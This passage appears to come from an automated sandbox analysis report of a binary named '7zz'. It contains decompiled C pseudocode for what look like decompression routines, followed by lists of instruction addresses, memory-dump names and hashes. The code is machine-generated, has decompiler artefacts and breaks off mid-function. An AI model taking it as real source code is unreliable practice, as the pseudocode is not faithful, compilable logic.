								}
								goto L113;
								L15:
								_t196 = (_t291 >> 0xb) * _t320;
								if(_t321 >= _t196) {
									_t291 = _t291 - _t196;
									_t321 = _t321 - _t196;
									_t281 = _t281 + _t281 + 1;
								} else {
									_t291 = _t196;
									_t281 = _t281 + _t281;
								}
							} while (_t281 < 0x100);
							L19:
							 *(_t351 + 0x1c) = 1;
							L20:
							_t344 =  *(_t351 + 0x28);
							L21:
							if(_t290 >= 0x1000000 || _t344 <  *(_t351 + 0x10)) {
								return  *(_t351 + 0x1c);
							} else {
								goto L2;
							}
						}
					}
				} else {
					_t199 =  *(_t351 + 0x28);
					if(_t199 <  *(_t351 + 0x10)) {
						_t283 = _t283 << 8;
						_t321 = _t321 << 0x00000008 |  *_t199 & 0x000000ff;
						 *(_t351 + 0x28) =  &(_t199[1]);
						goto L4;
					} else {
						L2:
						return 0;
					}
				}
				L113:
			}












































































                                                                                  0x0045e0c7
                                                                                  0x0045e0cd
                                                                                  0x0045e0d0
                                                                                  0x0045e0d3
                                                                                  0x0045e0d8
                                                                                  0x0045e0db
                                                                                  0x0045e0ee
                                                                                  0x0045e0f3
                                                                                  0x0045e0fc
                                                                                  0x0045e106
                                                                                  0x0045e12e
                                                                                  0x0045e133
                                                                                  0x0045e13a
                                                                                  0x0045e2c6
                                                                                  0x0045e2ca
                                                                                  0x0045e2ce
                                                                                  0x0045e2d0
                                                                                  0x0045e2da
                                                                                  0x0045e2e4
                                                                                  0x0045e300
                                                                                  0x0045e305
                                                                                  0x0045e30c
                                                                                  0x0045e32b
                                                                                  0x0045e32d
                                                                                  0x0045e32f
                                                                                  0x0045e337
                                                                                  0x0045e345
                                                                                  0x0045e361
                                                                                  0x0045e366
                                                                                  0x0045e369
                                                                                  0x0045e36f
                                                                                  0x0045e3d8
                                                                                  0x0045e3dc
                                                                                  0x0045e3de
                                                                                  0x0045e3e8
                                                                                  0x0045e3f2
                                                                                  0x0045e40e
                                                                                  0x0045e413
                                                                                  0x0045e41a
                                                                                  0x0045e420
                                                                                  0x0045e428
                                                                                  0x0045e42a
                                                                                  0x0045e432
                                                                                  0x0045e44e
                                                                                  0x0045e453
                                                                                  0x0045e458
                                                                                  0x00000000
                                                                                  0x0045e45a
                                                                                  0x0045e45a
                                                                                  0x0045e45a
                                                                                  0x00000000
                                                                                  0x0045e434
                                                                                  0x0045e438
                                                                                  0x00000000
                                                                                  0x0045e43e
                                                                                  0x0045e444
                                                                                  0x0045e447
                                                                                  0x0045e44a
                                                                                  0x00000000
                                                                                  0x0045e44a
                                                                                  0x0045e438
                                                                                  0x0045e41c
                                                                                  0x0045e41c
                                                                                  0x00000000
                                                                                  0x0045e41c
                                                                                  0x0045e3f4
                                                                                  0x0045e3f8
                                                                                  0x00000000
                                                                                  0x0045e3fe
                                                                                  0x0045e404
                                                                                  0x0045e407
                                                                                  0x0045e409
                                                                                  0x0045e40a
                                                                                  0x00000000
                                                                                  0x0045e40a
                                                                                  0x0045e3f8
                                                                                  0x0045e371
                                                                                  0x0045e379
                                                                                  0x0045e37d
                                                                                  0x0045e381
                                                                                  0x0045e389
                                                                                  0x0045e3a7
                                                                                  0x0045e3ac
                                                                                  0x0045e3b1
                                                                                  0x0045e45e
                                                                                  0x0045e45e
                                                                                  0x0045e460
                                                                                  0x0045e462
                                                                                  0x0045e466
                                                                                  0x0045e46a
                                                                                  0x0045e472
                                                                                  0x00000000
                                                                                  0x0045e3b7
                                                                                  0x0045e3bd
                                                                                  0x0045e3d5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0045e3bd
                                                                                  0x0045e38b
                                                                                  0x0045e38f
                                                                                  0x00000000
                                                                                  0x0045e395
                                                                                  0x0045e398
                                                                                  0x0045e3a0
                                                                                  0x0045e3a2
                                                                                  0x0045e3a3
                                                                                  0x00000000
                                                                                  0x0045e3a3
                                                                                  0x0045e38f
                                                                                  0x0045e389
                                                                                  0x0045e347
                                                                                  0x0045e34b
                                                                                  0x00000000
                                                                                  0x0045e351
                                                                                  0x0045e357
                                                                                  0x0045e35a
                                                                                  0x0045e35d
                                                                                  0x00000000
                                                                                  0x0045e35d
                                                                                  0x0045e34b
                                                                                  0x0045e30e
                                                                                  0x0045e30e
                                                                                  0x0045e310
                                                                                  0x0045e318
                                                                                  0x0045e31e
                                                                                  0x0045e478
                                                                                  0x0045e478
                                                                                  0x0045e481
                                                                                  0x0045e49d
                                                                                  0x0045e4a2
                                                                                  0x0045e4a5
                                                                                  0x0045e4ab
                                                                                  0x0045e4c1
                                                                                  0x0045e4c5
                                                                                  0x0045e4c7
                                                                                  0x0045e4cf
                                                                                  0x0045e4eb
                                                                                  0x0045e4f0
                                                                                  0x0045e4f5
                                                                                  0x0045e50d
                                                                                  0x0045e50f
                                                                                  0x0045e511
                                                                                  0x0045e517
                                                                                  0x0045e51c
                                                                                  0x0045e4f7
                                                                                  0x0045e4f9
                                                                                  0x0045e4fe
                                                                                  0x0045e500
                                                                                  0x0045e507
                                                                                  0x0045e507
                                                                                  0x00000000
                                                                                  0x0045e4d1
                                                                                  0x0045e4d5
                                                                                  0x00000000
                                                                                  0x0045e4db
                                                                                  0x0045e4e1
                                                                                  0x0045e4e4
                                                                                  0x0045e4e6
                                                                                  0x0045e4e7
                                                                                  0x00000000
                                                                                  0x0045e4e7
                                                                                  0x0045e4d5
                                                                                  0x0045e4ad
                                                                                  0x0045e4af
                                                                                  0x0045e4b1
                                                                                  0x0045e4b5
                                                                                  0x0045e4b7
                                                                                  0x0045e524
                                                                                  0x0045e524
                                                                                  0x00000000
                                                                                  0x0045e530
                                                                                  0x0045e536
                                                                                  0x0045e552
                                                                                  0x0045e55b
                                                                                  0x0045e560
                                                                                  0x0045e568
                                                                                  0x0045e56a
                                                                                  0x0045e56c
                                                                                  0x0045e562
                                                                                  0x0045e562
                                                                                  0x0045e564
                                                                                  0x0045e564
                                                                                  0x0045e570
                                                                                  0x0045e576
                                                                                  0x0045e580
                                                                                  0x0045e587
                                                                                  0x00000000
                                                                                  0x0045e58d
                                                                                  0x0045e590
                                                                                  0x0045e592
                                                                                  0x0045e592
                                                                                  0x0045e597
                                                                                  0x0045e59b
                                                                                  0x0045e5a2
                                                                                  0x0045e5a2
                                                                                  0x0045e5a9
                                                                                  0x0045e5b0
                                                                                  0x0045e5b0
                                                                                  0x0045e5ba
                                                                                  0x00000000
                                                                                  0x0045e5bc
                                                                                  0x0045e5c0
                                                                                  0x00000000
                                                                                  0x0045e5c6
                                                                                  0x0045e5cd
                                                                                  0x0045e5d0
                                                                                  0x0045e5d2
                                                                                  0x00000000
                                                                                  0x0045e5d2
                                                                                  0x0045e5c0
                                                                                  0x00000000
                                                                                  0x0045e5d3
                                                                                  0x0045e5d8
                                                                                  0x0045e5dd
                                                                                  0x0045e5e5
                                                                                  0x0045e5e7
                                                                                  0x0045e5e9
                                                                                  0x0045e5df
                                                                                  0x0045e5df
                                                                                  0x0045e5e1
                                                                                  0x0045e5e1
                                                                                  0x0045e5ed
                                                                                  0x0045e5f2
                                                                                  0x0045e5f8
                                                                                  0x00000000
                                                                                  0x0045e5fe
                                                                                  0x0045e602
                                                                                  0x0045e606
                                                                                  0x0045e625
                                                                                  0x0045e629
                                                                                  0x0045e630
                                                                                  0x0045e636
                                                                                  0x00000000
                                                                                  0x0045e638
                                                                                  0x0045e63a
                                                                                  0x00000000
                                                                                  0x0045e640
                                                                                  0x0045e647
                                                                                  0x0045e64a
                                                                                  0x0045e64c
                                                                                  0x00000000
                                                                                  0x0045e64c
                                                                                  0x0045e63a
                                                                                  0x00000000
                                                                                  0x0045e64d
                                                                                  0x0045e64d
                                                                                  0x0045e659
                                                                                  0x0045e65b
                                                                                  0x0045e65b
                                                                                  0x0045e668
                                                                                  0x0045e66c
                                                                                  0x00000000
                                                                                  0x0045e608
                                                                                  0x0045e61f
                                                                                  0x0045e671
                                                                                  0x0045e671
                                                                                  0x0045e680
                                                                                  0x0045e684
                                                                                  0x0045e68e
                                                                                  0x00000000
                                                                                  0x0045e690
                                                                                  0x0045e694
                                                                                  0x00000000
                                                                                  0x0045e69a
                                                                                  0x0045e6a1
                                                                                  0x0045e6a4
                                                                                  0x0045e6a6
                                                                                  0x00000000
                                                                                  0x0045e6a6
                                                                                  0x0045e694
                                                                                  0x00000000
                                                                                  0x0045e6a7
                                                                                  0x0045e6ac
                                                                                  0x0045e6b1
                                                                                  0x0045e6b9
                                                                                  0x0045e6bb
                                                                                  0x0045e6bd
                                                                                  0x0045e6b3
                                                                                  0x0045e6b3
                                                                                  0x0045e6b5
                                                                                  0x0045e6b5
                                                                                  0x0045e6c1
                                                                                  0x0045e6c1
                                                                                  0x00000000
                                                                                  0x0045e6c4
                                                                                  0x0045e606
                                                                                  0x0045e5f8
                                                                                  0x0045e578
                                                                                  0x0045e578
                                                                                  0x00000000
                                                                                  0x0045e578
                                                                                  0x0045e538
                                                                                  0x0045e53c
                                                                                  0x00000000
                                                                                  0x0045e542
                                                                                  0x0045e548
                                                                                  0x0045e54b
                                                                                  0x0045e54e
                                                                                  0x00000000
                                                                                  0x0045e54e
                                                                                  0x0045e53c
                                                                                  0x00000000
                                                                                  0x0045e536
                                                                                  0x0045e530
                                                                                  0x0045e483
                                                                                  0x0045e487
                                                                                  0x00000000
                                                                                  0x0045e48d
                                                                                  0x0045e493
                                                                                  0x0045e496
                                                                                  0x0045e499
                                                                                  0x00000000
                                                                                  0x0045e499
                                                                                  0x0045e487
                                                                                  0x0045e481
                                                                                  0x0045e2e6
                                                                                  0x0045e2ea
                                                                                  0x00000000
                                                                                  0x0045e2f0
                                                                                  0x0045e2f6
                                                                                  0x0045e2f9
                                                                                  0x0045e2fb
                                                                                  0x0045e2fc
                                                                                  0x00000000
                                                                                  0x0045e2fc
                                                                                  0x0045e2ea
                                                                                  0x0045e140
                                                                                  0x0045e140
                                                                                  0x0045e14f
                                                                                  0x0045e153
                                                                                  0x0045e15b
                                                                                  0x0045e160
                                                                                  0x0045e162
                                                                                  0x0045e162
                                                                                  0x0045e192
                                                                                  0x0045e192
                                                                                  0x0045e199
                                                                                  0x0045e22c
                                                                                  0x0045e22f
                                                                                  0x0045e234
                                                                                  0x0045e23b
                                                                                  0x0045e236
                                                                                  0x0045e236
                                                                                  0x0045e236
                                                                                  0x0045e244
                                                                                  0x0045e248
                                                                                  0x0045e24d
                                                                                  0x0045e252
                                                                                  0x0045e256
                                                                                  0x0045e25a
                                                                                  0x0045e25c
                                                                                  0x0045e26a
                                                                                  0x0045e274
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0045e276
                                                                                  0x0045e27e
                                                                                  0x00000000
                                                                                  0x0045e284
                                                                                  0x0045e28a
                                                                                  0x0045e28d
                                                                                  0x0045e290
                                                                                  0x00000000
                                                                                  0x0045e290
                                                                                  0x00000000
                                                                                  0x0045e294
                                                                                  0x0045e299
                                                                                  0x0045e2a0
                                                                                  0x0045e2aa
                                                                                  0x0045e2ac
                                                                                  0x0045e2ae
                                                                                  0x0045e2a2
                                                                                  0x0045e2a2
                                                                                  0x0045e2a4
                                                                                  0x0045e2a6
                                                                                  0x0045e2a6
                                                                                  0x0045e2b2
                                                                                  0x0045e2ba
                                                                                  0x00000000
                                                                                  0x0045e2c0
                                                                                  0x0045e2c0
                                                                                  0x00000000
                                                                                  0x0045e2c0
                                                                                  0x00000000
                                                                                  0x0045e2ba
                                                                                  0x0045e19f
                                                                                  0x0045e19f
                                                                                  0x0045e1b0
                                                                                  0x0045e1b4
                                                                                  0x0045e1be
                                                                                  0x00000000
                                                                                  0x0045e1c0
                                                                                  0x0045e1c0
                                                                                  0x0045e1c8
                                                                                  0x00000000
                                                                                  0x0045e1ce
                                                                                  0x0045e1d4
                                                                                  0x0045e1d7
                                                                                  0x0045e1da
                                                                                  0x00000000
                                                                                  0x0045e1da
                                                                                  0x0045e1c8
                                                                                  0x00000000
                                                                                  0x0045e1de
                                                                                  0x0045e1e3
                                                                                  0x0045e1e8
                                                                                  0x0045e1f0
                                                                                  0x0045e1f2
                                                                                  0x0045e1f4
                                                                                  0x0045e1ea
                                                                                  0x0045e1ea
                                                                                  0x0045e1ec
                                                                                  0x0045e1ec
                                                                                  0x0045e1f8
                                                                                  0x0045e200
                                                                                  0x0045e200
                                                                                  0x0045e208
                                                                                  0x0045e208
                                                                                  0x0045e20c
                                                                                  0x0045e212
                                                                                  0x0045e229
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0045e212
                                                                                  0x0045e199
                                                                                  0x0045e108
                                                                                  0x0045e108
                                                                                  0x0045e110
                                                                                  0x0045e124
                                                                                  0x0045e127
                                                                                  0x0045e12a
                                                                                  0x00000000
                                                                                  0x0045e115
                                                                                  0x0045e115
                                                                                  0x0045e11b
                                                                                  0x0045e11b
                                                                                  0x0045e110
                                                                                  0x00000000

                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000F.00000002.401310359.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 0000000F.00000002.401259398.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401384599.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401606667.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401655970.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401667855.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401685351.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401698545.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 0000000F.00000002.401715453.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                                                                  • Instruction ID: e022bf08bd3fa299583df900fa6ce6294aaf835f4f5ad4fca60e15bd747eae71
                                                                                  • Opcode Fuzzy Hash: 27156ca4970ad7a14cafdd4d0f561c0251ce2efe8b7cb58f4bb8e0a1a151ff8a
                                                                                  • Instruction Fuzzy Hash: 39022972A042118BD71CCE19C580279BBE3FBC5346F110A3FEC9697686D6389A4DCB99
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Function 00454B10 Relevance: .5, Instructions: 475COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 95%
                                                                                  			E00454B10(void* __ecx, void* __eflags) {
				void* __edi;
				int _t219;
				unsigned char _t223;
				int _t225;
				int _t227;
				int _t228;
				intOrPtr _t234;
				intOrPtr _t235;
				signed int* _t236;
				signed int _t242;
				int _t245;
				int _t247;
				int _t251;
				signed int _t254;
				intOrPtr _t257;
				signed int _t258;
				void* _t259;
				signed int _t260;
				int _t264;
				int _t267;
				int _t269;
				signed int _t272;
				int _t275;
				int _t277;
				int _t281;
				int _t283;
				int _t287;
				int _t289;
				int _t293;
				int _t295;
				int _t299;
				int _t301;
				signed char _t305;
				signed int _t307;
				signed char _t317;
				signed char _t332;
				int _t349;
				char _t355;
				signed int _t357;
				signed int _t358;
				int _t361;
				signed int _t366;
				int _t391;
				signed int _t406;
				signed int _t421;
				signed int _t431;
				int _t432;
				void* _t433;
				int _t434;
				signed int _t435;
				void* _t436;
				void* _t441;
				intOrPtr _t443;
				void* _t444;

				_push(0xffffffff);
				_push(E00479B9E);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t443;
				_t444 = _t443 - 0x94;
				_t441 = __ecx;
				E0040DF82(_t444 + 0x1c);
				_t421 = 0;
				 *(_t444 + 0xac) = 0;
				 *((intOrPtr*)(_t444 + 0x40)) = 0;
				 *((intOrPtr*)(_t444 + 0x44)) = 0;
				 *(_t444 + 0x54) = 0;
				 *((intOrPtr*)(_t444 + 0x60)) = 0;
				 *((char*)(_t444 + 0xb0)) = 1;
				if(E0040DF95(_t444 + 0x20, 0x100000) != 0) {
					E0040DFE4(_t444 + 0x1c,  *((intOrPtr*)(_t444 + 0xb4)));
					E0040DFF3(_t444 + 0x1c);
					_t219 = L0040EE76(_t444 + 0x44, 0x100000);
					__eflags = _t219;
					if(_t219 != 0) {
						L0040EEC1(_t444 + 0x40,  *((intOrPtr*)(_t444 + 0xb8)));
						L0040EED0(_t444 + 0x40);
						_t223 =  *((intOrPtr*)(__ecx + 0x18));
						_t317 = _t223 & 0x0000001f;
						_t305 = _t317;
						__eflags = _t305 - 9;
						 *(_t444 + 0x74) = _t305;
						if(_t305 < 9) {
							L81:
							 *(_t444 + 0xac) = 6;
							L0040EEB2(_t444 + 0x40);
							_t225 =  *(_t444 + 0x54);
							 *(_t444 + 0xac) = 0;
							__eflags = _t225 - _t421;
							if(_t225 != _t421) {
								 *((intOrPtr*)( *_t225 + 8))(_t225);
							}
							 *(_t444 + 0xac) = 7;
							E0040DFD3(_t444 + 0x1c);
							_t227 =  *(_t444 + 0x28);
							 *(_t444 + 0xac) = 0xffffffff;
							__eflags = _t227 - _t421;
							if(_t227 == _t421) {
								L85:
								_t228 = 1;
								goto L86;
							} else {
								L84:
								 *((intOrPtr*)( *_t227 + 8))(_t227);
								goto L85;
							}
						}
						__eflags = _t305 - 0x10;
						if(_t305 > 0x10) {
							goto L81;
						}
						_t431 = 1 << _t317;
						 *(_t444 + 0x13) = _t223 >> 7;
						__eflags = _t305 -  *((intOrPtr*)(__ecx + 0x1c));
						 *(_t444 + 0x70) = 1;
						if(_t305 !=  *((intOrPtr*)(__ecx + 0x1c))) {
							L17:
							E00454AB0(_t441);
							_t234 = E00458590(_t431 + _t431);
							__eflags = _t234 - _t421;
							 *((intOrPtr*)(_t441 + 0xc)) = _t234;
							if(_t234 != _t421) {
								_t235 = E00458590(_t431);
								__eflags = _t235 - _t421;
								 *((intOrPtr*)(_t441 + 0x10)) = _t235;
								if(_t235 != _t421) {
									_t236 = E00458590(_t431);
									__eflags = _t236 - _t421;
									 *(_t441 + 0x14) = _t236;
									if(_t236 != _t421) {
										 *(_t441 + 0x1c) = _t305;
										L34:
										 *(_t444 + 0x68) = _t421;
										__eflags =  *(_t444 + 0x13);
										 *( *((intOrPtr*)(_t441 + 0xc)) + 0x200) = _t421;
										_t391 = (0 |  *(_t444 + 0x13) != 0x00000000) + 0x100;
										__eflags = _t391;
										 *(_t444 + 0x6c) = _t421;
										_t307 = 9;
										 *(_t444 + 0x18) = _t391;
										 *(_t444 + 0x12) = 0;
										 *(_t444 + 0x14) = _t421;
										 *((char*)( *((intOrPtr*)(_t441 + 0x10)) + 0x100)) = 0;
										while(1) {
											__eflags =  *(_t444 + 0x14) - _t421;
											if( *(_t444 + 0x14) != _t421) {
												goto L50;
											}
											L36:
											_t259 =  *(_t444 + 0x1c);
											__eflags =  *((intOrPtr*)(_t444 + 0x20)) - _t259 - _t307;
											if( *((intOrPtr*)(_t444 + 0x20)) - _t259 < _t307) {
												_t435 = 0;
												__eflags = _t307;
												if(_t307 <= 0) {
													L45:
													_t435 = _t307;
													L46:
													_t406 = _t435 * 8;
													 *(_t444 + 0x14) = _t406;
													_t421 = 0;
													_t260 = L0040EEE8(_t444 + 0x40);
													 *(_t444 + 0x88) = _t260;
													__eflags =  *(_t444 + 0xc4);
													 *(_t444 + 0x8c) = _t406;
													if( *(_t444 + 0xc4) == 0) {
														goto L50;
													}
													_t349 = _t260 -  *(_t444 + 0x68);
													__eflags = _t349;
													asm("sbb esi, [esp+0x6c]");
													 *(_t444 + 0x7c) = _t406;
													if(_t349 != 0) {
														L49:
														 *(_t444 + 0x68) = _t260;
														 *(_t444 + 0x6c) = _t406;
														asm("cdq");
														asm("adc edx, ecx");
														 *((intOrPtr*)(_t444 + 0x80)) =  *(_t444 + 0x1c) -  *((intOrPtr*)(_t444 + 0x24)) +  *((intOrPtr*)(_t444 + 0x2c));
														_t264 =  *(_t444 + 0xc4);
														 *(_t444 + 0x84) = _t406;
														_t432 =  *((intOrPtr*)( *_t264 + 0xc))(_t264, _t444 + 0x84, _t444 + 0x88);
														__eflags = _t432;
														if(_t432 != 0) {
															 *(_t444 + 0xac) = 0xe;
															L0040EEB2(_t444 + 0x40);
															_t267 =  *(_t444 + 0x54);
															 *(_t444 + 0xac) = 0;
															__eflags = _t267;
															if(_t267 != 0) {
																 *((intOrPtr*)( *_t267 + 8))(_t267);
															}
															 *(_t444 + 0xac) = 0xf;
															L74:
															E0040DFD3(_t444 + 0x1c);
															_t247 =  *(_t444 + 0x28);
															 *(_t444 + 0xac) = 0xffffffff;
															__eflags = _t247;
															if(_t247 != 0) {
																 *((intOrPtr*)( *_t247 + 8))(_t247);
															}
															_t228 = _t432;
															goto L86;
														}
														goto L50;
													}
													__eflags = _t349 - 0x40000;
													if(_t349 < 0x40000) {
														goto L50;
													}
													goto L49;
												} else {
													goto L41;
												}
												do {
													L41:
													__eflags = _t259 -  *((intOrPtr*)(_t444 + 0x20));
													if(_t259 <  *((intOrPtr*)(_t444 + 0x20))) {
														goto L44;
													}
													_t269 = E0040E007(_t444 + 0x1c, _t421);
													__eflags = _t269;
													if(_t269 == 0) {
														goto L46;
													}
													_t259 =  *(_t444 + 0x1c);
													L44:
													_t355 =  *_t259;
													_t259 = _t259 + 1;
													 *((char*)(_t444 + _t435 + 0x90)) = _t355;
													_t435 = _t435 + 1;
													__eflags = _t435 - _t307;
													 *(_t444 + 0x1c) = _t259;
												} while (_t435 < _t307);
												goto L45;
											}
											__eflags = _t307;
											if(_t307 > 0) {
												_t357 = _t307;
												_t436 = _t259;
												_t358 = _t357 >> 2;
												memcpy(_t444 + 0x90, _t436, _t358 << 2);
												_t361 = _t357 & 0x00000003;
												__eflags = _t361;
												_t259 = memcpy(_t436 + _t358 + _t358, _t436, _t361);
												_t444 = _t444 + 0x18;
											}
											 *(_t444 + 0x1c) = _t259 + _t307;
											goto L45;
											L50:
											 *(_t444 + 0x78) = 1 << _t307;
											_t332 = _t421 & 0x00000007;
											_t421 = _t421 + _t307;
											_t242 =  *(_t444 + 0x78) - 0x00000001 & 0 << 0x00000008 >> _t332;
											__eflags = _t421 -  *(_t444 + 0x14);
											 *(_t444 + 0x3c) = _t242;
											if(_t421 >  *(_t444 + 0x14)) {
												_t432 = L0040EFA1(_t444 + 0x40);
												 *(_t444 + 0xac) = 0x12;
												L0040EEB2(_t444 + 0x40);
												_t245 =  *(_t444 + 0x54);
												 *(_t444 + 0xac) = 0;
												__eflags = _t245;
												if(_t245 != 0) {
													 *((intOrPtr*)( *_t245 + 8))(_t245);
												}
												 *(_t444 + 0xac) = 0x13;
												goto L74;
											}
											__eflags = _t242 -  *(_t444 + 0x18);
											if(_t242 >=  *(_t444 + 0x18)) {
												 *(_t444 + 0xac) = 0x10;
												L0040EEB2(_t444 + 0x40);
												_t251 =  *(_t444 + 0x54);
												 *(_t444 + 0xac) = 0;
												__eflags = _t251;
												if(_t251 != 0) {
													 *((intOrPtr*)( *_t251 + 8))(_t251);
												}
												 *(_t444 + 0xac) = 0x11;
												E0040DFD3(_t444 + 0x1c);
												_t227 =  *(_t444 + 0x28);
												 *(_t444 + 0xac) = 0xffffffff;
												__eflags = _t227;
												if(_t227 == 0) {
													goto L85;
												} else {
													goto L84;
												}
											}
											__eflags =  *(_t444 + 0x13);
											if( *(_t444 + 0x13) == 0) {
												L56:
												_t254 =  *(_t444 + 0x3c);
												_t433 = 0;
												__eflags = _t254 - 0x100;
												if(_t254 < 0x100) {
													L58:
													 *(_t433 +  *(_t441 + 0x14)) = _t254;
													_t434 = _t433 + 1;
													__eflags =  *(_t444 + 0x12);
													if( *(_t444 + 0x12) != 0) {
														_t366 =  *(_t444 + 0x18);
														 *(_t366 +  *((intOrPtr*)(_t441 + 0x10)) - 1) = _t254;
														__eflags =  *(_t444 + 0x3c) - _t366 - 1;
														if( *(_t444 + 0x3c) == _t366 - 1) {
															 *( *(_t441 + 0x14)) = _t254;
														}
													}
													do {
														_t434 = _t434 - 1;
														 *((char*)( *((intOrPtr*)(_t444 + 0x44)) +  *((intOrPtr*)(_t444 + 0x40)))) =  *((intOrPtr*)( *(_t441 + 0x14) + _t434));
														_t257 =  *((intOrPtr*)(_t444 + 0x44)) + 1;
														__eflags = _t257 -  *((intOrPtr*)(_t444 + 0x48));
														 *((intOrPtr*)(_t444 + 0x44)) = _t257;
														if(__eflags == 0) {
															L0040EFBD(_t444 + 0x40, __eflags);
														}
														__eflags = _t434;
													} while (_t434 > 0);
													_t258 =  *(_t444 + 0x18);
													__eflags = _t258 -  *(_t444 + 0x70);
													if(_t258 >=  *(_t444 + 0x70)) {
														L55:
														 *(_t444 + 0x12) = 0;
														while(1) {
															__eflags =  *(_t444 + 0x14) - _t421;
															if( *(_t444 + 0x14) != _t421) {
																goto L50;
															}
															goto L36;
														}
													}
													 *(_t444 + 0x12) = 1;
													 *((short*)( *((intOrPtr*)(_t441 + 0xc)) + _t258 * 2)) =  *(_t444 + 0x3c);
													_t272 = _t258 + 1;
													__eflags = _t272 -  *(_t444 + 0x78);
													 *(_t444 + 0x18) = _t272;
													if(_t272 >  *(_t444 + 0x78)) {
														__eflags = _t307 -  *(_t444 + 0x74);
														if(_t307 <  *(_t444 + 0x74)) {
															_t421 = 0;
															_t307 = _t307 + 1;
															 *(_t444 + 0x14) = 0;
														}
													}
													continue;
												} else {
													goto L57;
												}
												do {
													L57:
													_t433 = _t433 + 1;
													 *((char*)(_t433 +  *(_t441 + 0x14) - 1)) =  *((intOrPtr*)(_t254 +  *((intOrPtr*)(_t441 + 0x10))));
													_t254 = 0;
													__eflags = 0 - 0x100;
												} while (0 >= 0x100);
												goto L58;
											}
											__eflags = _t242 - 0x100;
											if(_t242 != 0x100) {
												goto L56;
											}
											_t421 = 0;
											__eflags = 0;
											_t307 = 9;
											 *(_t444 + 0x14) = 0;
											 *(_t444 + 0x18) = 0x101;
											goto L55;
										}
									}
									 *(_t444 + 0xac) = 0xc;
									L0040EEB2(_t444 + 0x40);
									_t275 =  *(_t444 + 0x54);
									 *(_t444 + 0xac) = 0;
									__eflags = _t275 - _t421;
									if(_t275 != _t421) {
										 *((intOrPtr*)( *_t275 + 8))(_t275);
									}
									 *(_t444 + 0xac) = 0xd;
									E0040DFD3(_t444 + 0x1c);
									_t277 =  *(_t444 + 0x28);
									 *(_t444 + 0xac) = 0xffffffff;
									__eflags = _t277 - _t421;
									if(_t277 != _t421) {
										 *((intOrPtr*)( *_t277 + 8))(_t277);
									}
									L32:
									_t228 = 0x8007000e;
									goto L86;
								}
								 *(_t444 + 0xac) = 0xa;
								L0040EEB2(_t444 + 0x40);
								_t281 =  *(_t444 + 0x54);
								 *(_t444 + 0xac) = 0;
								__eflags = _t281 - _t421;
								if(_t281 != _t421) {
									 *((intOrPtr*)( *_t281 + 8))(_t281);
								}
								 *(_t444 + 0xac) = 0xb;
								E0040DFD3(_t444 + 0x1c);
								_t283 =  *(_t444 + 0x28);
								 *(_t444 + 0xac) = 0xffffffff;
								__eflags = _t283 - _t421;
								if(_t283 == _t421) {
									goto L32;
								} else {
									 *((intOrPtr*)( *_t283 + 8))(_t283);
									_t228 = 0x8007000e;
									goto L86;
								}
							}
							 *(_t444 + 0xac) = 8;
							L0040EEB2(_t444 + 0x40);
							_t287 =  *(_t444 + 0x54);
							 *(_t444 + 0xac) = 0;
							__eflags = _t287 - _t421;
							if(_t287 != _t421) {
								 *((intOrPtr*)( *_t287 + 8))(_t287);
							}
							 *(_t444 + 0xac) = 9;
							E0040DFD3(_t444 + 0x1c);
							_t289 =  *(_t444 + 0x28);
							 *(_t444 + 0xac) = 0xffffffff;
							__eflags = _t289 - _t421;
							if(_t289 == _t421) {
								goto L32;
							} else {
								 *((intOrPtr*)( *_t289 + 8))(_t289);
								_t228 = 0x8007000e;
								goto L86;
							}
						}
						__eflags =  *(__ecx + 0xc);
						if( *(__ecx + 0xc) == 0) {
							goto L17;
						}
						__eflags =  *(__ecx + 0x10);
						if( *(__ecx + 0x10) == 0) {
							goto L17;
						}
						__eflags =  *(__ecx + 0x14);
						if( *(__ecx + 0x14) != 0) {
							goto L34;
						}
						goto L17;
					} else {
						 *(_t444 + 0xac) = 4;
						L0040EEB2(_t444 + 0x40);
						_t293 =  *(_t444 + 0x54);
						 *(_t444 + 0xac) = 0;
						__eflags = _t293;
						if(_t293 != 0) {
							 *((intOrPtr*)( *_t293 + 8))(_t293);
						}
						 *(_t444 + 0xac) = 5;
						E0040DFD3(_t444 + 0x1c);
						_t295 =  *(_t444 + 0x28);
						 *(_t444 + 0xac) = 0xffffffff;
						__eflags = _t295 - _t421;
						if(_t295 != _t421) {
							 *((intOrPtr*)( *_t295 + 8))(_t295);
						}
						goto L10;
					}
				} else {
					 *(_t444 + 0xac) = 2;
					L0040EEB2(_t444 + 0x40);
					_t299 =  *(_t444 + 0x54);
					 *(_t444 + 0xac) = 0;
					if(_t299 != 0) {
						 *((intOrPtr*)( *_t299 + 8))(_t299);
					}
					 *(_t444 + 0xac) = 3;
					E0040DFD3(_t444 + 0x1c);
					_t301 =  *(_t444 + 0x28);
					 *(_t444 + 0xac) = 0xffffffff;
					if(_t301 == _t421) {
						L10:
						_t228 = 0x8007000e;
						goto L86;
					} else {
						 *((intOrPtr*)( *_t301 + 8))(_t301);
						_t228 = 0x8007000e;
						L86:
